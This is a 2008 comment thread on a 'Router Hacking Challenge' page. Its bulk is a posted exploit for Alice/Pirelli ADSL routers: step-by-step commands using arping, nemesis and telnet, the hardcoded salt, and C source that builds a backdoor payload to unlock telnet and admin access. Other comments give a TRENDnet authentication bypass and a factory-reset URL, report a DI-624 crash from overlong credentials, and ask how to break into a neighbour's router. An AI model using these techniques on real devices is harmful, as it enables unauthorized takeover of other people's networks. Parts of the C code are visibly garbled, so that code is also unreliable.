Comments on: Router Hacking Challenge

By: Kender

Kender — Fri, 05 Dec 2008 23:29:51 +0000

Sure, I added a link to the source on my page. I never finished it..

By: jjacks

jjacks — Mon, 01 Dec 2008 19:31:31 +0000

Hi Kender, could you reveal spt.dat decompressor source code? ?I’m trying to use it with 120KB file, getting Index out of range exception all the time. How long was yours spt.dat?

By: holddigga

holddigga — Sat, 29 Nov 2008 04:39:06 +0000

The TRENDnet TEW-633GR doesn’t authenticate past the first page. I.E. if you enter /Basic/Wireless.shtml you will be able to modify the wireless settings, without entering a password! This will also get you to any other config page within the router. Also if you enter /reboot.cgi?reset=true, you will reset the router to factory defaults.

By: Excalibur

Excalibur — Sat, 15 Nov 2008 12:47:07 +0000

Hmmm…Once i’m logged in, click “File-Page Save As” and selecting “webpage complete” and can just double the htm file to get in…wonder if this would work on another router the same as mine using my htm file…

By: saxdax & drpepperONE

saxdax & drpepperONE — Mon, 13 Oct 2008 23:30:33 +0000

#############################################################################################

				saxdax & drpepperONE


Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface
with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactered
by Pirelli based on Broadcom platform.

#############################################################################################

                        saxdax & drpepperONE

Router Vendor:		Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli
				based on Broadcom platform.
              		
Model Affected:		AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2 plus]
				AG2P-AG3[Alice Gate W2+]/AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi]
              		
Firmware Version:		All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version are affected.

Platforms:    		Customized Linux version 2.6.8.1 on Broadcom BCM96348 chipset.

Vulnerability:          enable telnet/ftp/tftp and web-admin from internal lan.		

Exploitation: 		internal network lan, versus Router 

Date:         		13 Oct 2008

Authors:       		saxdax & drpepperONE

e-mail: 			saxdax2@gmail.com		drpepppperone@gmail.com

Risk: 			medium>low
        
#############################################################################################

1) Introduction
2) Vulnerability
3) The Exploit
4) The Code
5) Fix

#############################################################################################

===============
1) Introduction
===============

Telecom Italia is the most important Italian ISP offering an ADSL service named "Alice".
Telecom Italia rent out with "Alice Adsl" service, different CPE Modem/Router among which 
the affected ones.
The interface to configure these modems are made extremily poor by the provider to ensure
more control.
There's no way to enable telnet, ftp, tftp or more advanced web pages from the web interface.

http://www.telecomitalia.com/
http://adsl.alice.it/

#############################################################################################

================
2) Vulnerability
================

An attacker can activate and get unauthorized access to the routers administration
interface and telnet/ftp/tftp services from internal network.

Every user in the LAN (or Wireless LAN) can nevertheless have access to the routers
administration interface and telnet/ftp/tftp!

If an attacker can get access to the administrator interface and login, he has full control
over the routers configuration.

#############################################################################################


==============
3) The Exploit
==============

To enable telnet/ftp/tftp and web-admin interface it is necessary send a special
IP packet to router specific ip 192.168.1.1.
This works only from internal LAN where an attacker have and ip like 192.168.1.XX.
The ip packet send to router must have the following feature:

1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router)
2)Payload size 8 byte
3)The payload are the first 8 byte of a salted md5 of the mac address of device br0
4)br0 in these modems has the same mac of eth0

When the modem receives the packet all services will be enabled.


Example:


From a GNU/LINUX distrib:

1)Retrieve br0 maccaddress:

arping -I eth0 -c 2 192.168.1.1

ARPING 192.168.1.1 from 192.168.1.2 eth0
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  8.419ms
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  2.095ms
Sent 2 probes (1 broadcast(s))
Received 2 response(s)


2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte long file with the mac address.
	run the application below and copy the output hash.
	http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html

3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file (with the tool you like)

	i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex


4)Telnet to router :

	telnet 192.168.1.1

	BCM96348 ADSL Router
	Login: admin
	Password: 



#############################################################################################


===========
4) The Code
===========

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet   */
/* the mac must be in an hex file and has to be passed as argument to the program */

#include 
#include 
#include 
#include "md5.h"


/*
 *  RFC 1321 compliant MD5 implementation
 *
 *  Copyright (C) 2001-2003  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */



#define GET_UINT32(n,b,i)                       \
{                                               \
    (n) = ( (uint32) (b)[(i)    ]       )       \
        | ( (uint32) (b)[(i) + 1] <<  8 )       \
        | ( (uint32) (b)[(i) + 2] << 16 )       \
        | ( (uint32) (b)[(i) + 3] <>  8 );       \
    (b)[(i) + 2] = (uint8) ( (n) >> 16 );       \
    (b)[(i) + 3] = (uint8) ( (n) >> 24 );       \
}

void md5_starts( md5_context *ctx )
{
    ctx->total[0] = 0;
    ctx->total[1] = 0;

    ctx->state[0] = 0x67452301;
    ctx->state[1] = 0xEFCDAB89;
    ctx->state[2] = 0x98BADCFE;
    ctx->state[3] = 0x10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
    uint32 X[16], A, B, C, D;

    GET_UINT32( X[0],  data,  0 );
    GET_UINT32( X[1],  data,  4 );
    GET_UINT32( X[2],  data,  8 );
    GET_UINT32( X[3],  data, 12 );
    GET_UINT32( X[4],  data, 16 );
    GET_UINT32( X[5],  data, 20 );
    GET_UINT32( X[6],  data, 24 );
    GET_UINT32( X[7],  data, 28 );
    GET_UINT32( X[8],  data, 32 );
    GET_UINT32( X[9],  data, 36 );
    GET_UINT32( X[10], data, 40 );
    GET_UINT32( X[11], data, 44 );
    GET_UINT32( X[12], data, 48 );
    GET_UINT32( X[13], data, 52 );
    GET_UINT32( X[14], data, 56 );
    GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x <> (32 - n)))

#define P(a,b,c,d,k,s,t)                                \
{                                                       \
    a += F(b,c,d) + X[k] + t; a = S(a,s) + b;           \
}

    A = ctx->state[0];
    B = ctx->state[1];
    C = ctx->state[2];
    D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

    P( A, B, C, D,  0,  7, 0xD76AA478 );
    P( D, A, B, C,  1, 12, 0xE8C7B756 );
    P( C, D, A, B,  2, 17, 0x242070DB );
    P( B, C, D, A,  3, 22, 0xC1BDCEEE );
    P( A, B, C, D,  4,  7, 0xF57C0FAF );
    P( D, A, B, C,  5, 12, 0x4787C62A );
    P( C, D, A, B,  6, 17, 0xA8304613 );
    P( B, C, D, A,  7, 22, 0xFD469501 );
    P( A, B, C, D,  8,  7, 0x698098D8 );
    P( D, A, B, C,  9, 12, 0x8B44F7AF );
    P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
    P( B, C, D, A, 11, 22, 0x895CD7BE );
    P( A, B, C, D, 12,  7, 0x6B901122 );
    P( D, A, B, C, 13, 12, 0xFD987193 );
    P( C, D, A, B, 14, 17, 0xA679438E );
    P( B, C, D, A, 15, 22, 0x49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

    P( A, B, C, D,  1,  5, 0xF61E2562 );
    P( D, A, B, C,  6,  9, 0xC040B340 );
    P( C, D, A, B, 11, 14, 0x265E5A51 );
    P( B, C, D, A,  0, 20, 0xE9B6C7AA );
    P( A, B, C, D,  5,  5, 0xD62F105D );
    P( D, A, B, C, 10,  9, 0x02441453 );
    P( C, D, A, B, 15, 14, 0xD8A1E681 );
    P( B, C, D, A,  4, 20, 0xE7D3FBC8 );
    P( A, B, C, D,  9,  5, 0x21E1CDE6 );
    P( D, A, B, C, 14,  9, 0xC33707D6 );
    P( C, D, A, B,  3, 14, 0xF4D50D87 );
    P( B, C, D, A,  8, 20, 0x455A14ED );
    P( A, B, C, D, 13,  5, 0xA9E3E905 );
    P( D, A, B, C,  2,  9, 0xFCEFA3F8 );
    P( C, D, A, B,  7, 14, 0x676F02D9 );
    P( B, C, D, A, 12, 20, 0x8D2A4C8A );

#undef F
    
#define F(x,y,z) (x ^ y ^ z)

    P( A, B, C, D,  5,  4, 0xFFFA3942 );
    P( D, A, B, C,  8, 11, 0x8771F681 );
    P( C, D, A, B, 11, 16, 0x6D9D6122 );
    P( B, C, D, A, 14, 23, 0xFDE5380C );
    P( A, B, C, D,  1,  4, 0xA4BEEA44 );
    P( D, A, B, C,  4, 11, 0x4BDECFA9 );
    P( C, D, A, B,  7, 16, 0xF6BB4B60 );
    P( B, C, D, A, 10, 23, 0xBEBFBC70 );
    P( A, B, C, D, 13,  4, 0x289B7EC6 );
    P( D, A, B, C,  0, 11, 0xEAA127FA );
    P( C, D, A, B,  3, 16, 0xD4EF3085 );
    P( B, C, D, A,  6, 23, 0x04881D05 );
    P( A, B, C, D,  9,  4, 0xD9D4D039 );
    P( D, A, B, C, 12, 11, 0xE6DB99E5 );
    P( C, D, A, B, 15, 16, 0x1FA27CF8 );
    P( B, C, D, A,  2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

    P( A, B, C, D,  0,  6, 0xF4292244 );
    P( D, A, B, C,  7, 10, 0x432AFF97 );
    P( C, D, A, B, 14, 15, 0xAB9423A7 );
    P( B, C, D, A,  5, 21, 0xFC93A039 );
    P( A, B, C, D, 12,  6, 0x655B59C3 );
    P( D, A, B, C,  3, 10, 0x8F0CCC92 );
    P( C, D, A, B, 10, 15, 0xFFEFF47D );
    P( B, C, D, A,  1, 21, 0x85845DD1 );
    P( A, B, C, D,  8,  6, 0x6FA87E4F );
    P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
    P( C, D, A, B,  6, 15, 0xA3014314 );
    P( B, C, D, A, 13, 21, 0x4E0811A1 );
    P( A, B, C, D,  4,  6, 0xF7537E82 );
    P( D, A, B, C, 11, 10, 0xBD3AF235 );
    P( C, D, A, B,  2, 15, 0x2AD7D2BB );
    P( B, C, D, A,  9, 21, 0xEB86D391 );

#undef F

    ctx->state[0] += A;
    ctx->state[1] += B;
    ctx->state[2] += C;
    ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
    uint32 left, fill;

    if( ! length ) return;

    left = ctx->total[0] & 0x3F;
    fill = 64 - left;

    ctx->total[0] += length;
    ctx->total[0] &= 0xFFFFFFFF;

    if( ctx->total[0] total[1]++;

    if( left && length >= fill )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, fill );
        md5_process( ctx, ctx->buffer );
        length -= fill;
        input  += fill;
        left = 0;
    }

    while( length >= 64 )
    {
        md5_process( ctx, input );
        length -= 64;
        input  += 64;
    }

    if( length )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, length );
    }
}

static uint8 md5_padding[64] =
{
 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
    uint32 last, padn;
    uint32 high, low;
    uint8 msglen[8];
	

    high = ( ctx->total[0] >> 29 )
         | ( ctx->total[1] <total[0] <<  3 );

    PUT_UINT32( low,  msglen, 0 );
    PUT_UINT32( high, msglen, 4 );

    //for(int i=0;itotal[0] & 0x3F;
    padn = ( last state[0], digest,  0 );
    PUT_UINT32( ctx->state[1], digest,  4 );
    PUT_UINT32( ctx->state[2], digest,  8 );
    PUT_UINT32( ctx->state[3], digest, 12 );
}

//#ifdef TEST



/*
 * those are the standard RFC 1321 test vectors
 */

static char *msg[] = 
{
    "",
    "a",
    "abc",
    "message digest",
    "abcdefghijklmnopqrstuvwxyz",
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    "12345678901234567890123456789012345678901234567890123456789012" \
        "345678901234567890"
};

static char *val[] =
{
    "d41d8cd98f00b204e9800998ecf8427e",
    "0cc175b9c0f1b6a831c399e269772661",
    "900150983cd24fb0d6963f7d28e17f72",
    "f96b697d7cb7938d525a2f31aaf161d0",
    "c3fcd3d76192e4007dfb496cca67e13b",
    "d174ab98d277d9f5a5611c2c9f419d9f",
    "57edf4a22be3c955ac49da2e2107b67a"
};

static char saltOrig[] =
{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, 0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33};

int main( int argc, char *argv[] )
{
    FILE *f;
    int i, j;
    char output[33];
    md5_context ctx;
    unsigned char buf[1000];
    unsigned char md5sum[16];
	unsigned char salt[20];
	
	printf( "****************************\n");
	printf( "Alice BackDoor hash creator \n");
	printf( "by saxdax and drPepperOne   \n");
	printf( "****************************\n\n");
    
	if( argc  0 )
    {
        md5_update( &ctx, buf, i );
    }
	
	memcpy(salt, saltOrig, 20);
	
	md5_update( &ctx, salt, 20 );

    md5_finish( &ctx, md5sum );
	
	printf("Payload is: ");
    for( j = 0; j < 8; j++ )
    {
        printf( "%02x", md5sum[j] );
    }

    return( 0 );
}







#############################################################################################

======
5) Fix
======


Atcualy at 13 Oct 2008 NO FIX available

#############################################################################################

By: Saqib Lodhi

Saqib Lodhi — Fri, 12 Sep 2008 03:10:46 +0000

How can i read D-Link DI-604 Config.bin file.

By: Aubade

Aubade — Fri, 06 Jun 2008 18:12:07 +0000

Hi. Your homepage is very nice! I have an MSI RG60SE wireless router. Unfortunately i can’t find the the config file, which contains the auth password. :( I tried in the /cgi-bin/ dir, (like D-link Routers) but i don’t know the cfg file name.

Have anybody hacked MSI router? If i would get a document file like http://kinqpinz.info/lib/wrt54g/own.txt , it would be great! Maybe there isn’t exist info file like this for the MSI’s stuff?

Thx

By: defcon

defcon — Wed, 04 Jun 2008 04:58:27 +0000

ive been messing around with my WRT150N, anyone have any luck hacking this?

By: frodo

frodo — Sun, 01 Jun 2008 09:18:50 +0000

That’s great peeps but I don’t see anybody hacking into netgear server 198.168.0.1 CG814WG could it be impossible?

And its not comcast/1234, or superuser/password or admin admin, need specifically the one to change advanced settings like the bluddy SPI firwall setting in order to play multiplayer in battlefield 2 ! make yoursleves useful wilya :)

sorry i got carried away

By: pdp

pdp — Mon, 12 May 2008 15:06:12 +0000

this is definitely not the place where you should ask these types of questions.

By: john

john — Sun, 11 May 2008 21:23:53 +0000

how to hack netgear administrator password

By: Kcir~

Kcir~ — Fri, 25 Apr 2008 18:34:42 +0000

I Have a config.bin for decrypt password. so possible? http://rapidshare.com/files/11.....g.bin.html

Tks.. ;)

By: jigar

jigar — Sun, 13 Apr 2008 06:17:42 +0000

hello
is it possible to hack router enable password.?

I have router but i can’t logging enable mode.
so give me tips how can i loging enable mode.
without rommon mode.

By: Adrian Pastor

Adrian Pastor — Thu, 03 Apr 2008 09:35:57 +0000

Regarding the DI-624 issue: yes, it could be a memory corruption bug (i.e: buffer overflow) but we shouldn’t ignore the possibility of a resource exhaustion issue, since the hardware of some embedded devices is very limited.

By: Adrian Pastor

Adrian Pastor — Thu, 03 Apr 2008 09:31:26 +0000

bug: once you have a XSS vulnerability on the router, all you have to do is use the XMLHttpRequest() function in the JavaScript which is executed in the XSS attack:
http://www.quirksmode.org/js/xmlhttp.html

Check out exploit #2 for the BT Home Hub for a real example on how to do this: http://www.gnucitizen.org/blog.....ome-hub-4/

By: klo

klo — Wed, 26 Mar 2008 10:27:34 +0000

“…it is not very clear from your post but are you saying that the payload has to be 298+ characters long?”

Yeah, for example, a 299 characters long username, or 149 char. long username with 150 char. password. All characters were in the ASCII range.

I basically came across this “http://secunia.com/advisories/29366/” and wanted to see if the DI-624 is also affected.

I forgot to mention the hardware revision is C3.

It seems like the source code for the device is available at “ftp://ftp.dlink.co.uk/GPL/DI-624_E1_GPL.tgz” but I haven’t had time to look over it yet…

By: pdp

pdp — Wed, 26 Mar 2008 07:45:15 +0000

what I believe it was happening is that you have crashed the a CGI script or the actual HTTP server which upon exit informed the system to reboot. this is a very common behavior among embedded devices. when you see an embedded device rebooting it is definitely because you caused something to do what it was not supposed/designed to - mostly stack, heap overflows. it is not very clear from your post but are you saying that the payload has to be 298+ characters long?

exploiting buffer overflows for these devices is as trivial as it can get but the only thing that is a problem is to either login into the device and observe any strange messages appearing in the log files which could indicate what the problem is, or attach yourself directly to the device motherboard via JTAG. the second is a bit more complicated. Once we have this information we can verify the exploitability of the problem by mangling with the address space and if passes all test we can sit down and spend time writing payload/shellcode for the affected architecture if there isn’t one yet.

By: klo

klo — Wed, 26 Mar 2008 04:12:29 +0000

I can confirm I can make the DI-624 reboot by supplying a username / password string of >298 characters long,
or a combination of the two that adds up to >298 characters, from the authentication dialogue box.

By: Voice of VOIPSA » Blog Archive » Hacking ZyXEL Gateways

Voice of VOIPSA » Blog Archive » Hacking ZyXEL Gateways — Mon, 24 Mar 2008 18:01:36 +0000

[...] “So what” you might say about the security of these types of devices? Well, SANS diary notes some strange things afoot at the Circle K with Dlink and the recent BT Home Hub CVE-2008-1334 router vulnerability. More routers and details at GNU Citizen. [...]

By: rebecca

rebecca — Sat, 15 Mar 2008 12:21:03 +0000

i dont have a wireless router all i want to do is hack my neighbours router i need the password to his router